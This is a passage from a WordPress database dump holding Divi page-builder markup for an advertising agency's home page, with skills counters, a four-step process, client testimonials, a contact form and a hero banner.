header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-03-22 11:14:24','2021-03-22 11:14:24','',134,'https://wthtest1.in8.cdn-alpha.com/134-revision-v1/',0,'revision','',0),(788,1,'2021-03-22 11:23:36','2021-03-22 11:23:36','','banner (1)','','inherit','open','closed','','banner-1','','','2021-03-22 11:23:36','2021-03-22 11:23:36','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg',0,'attachment','image/jpeg',0),(789,1,'2021-03-22 11:24:11','2021-03-22 11:24:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner (1)\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" 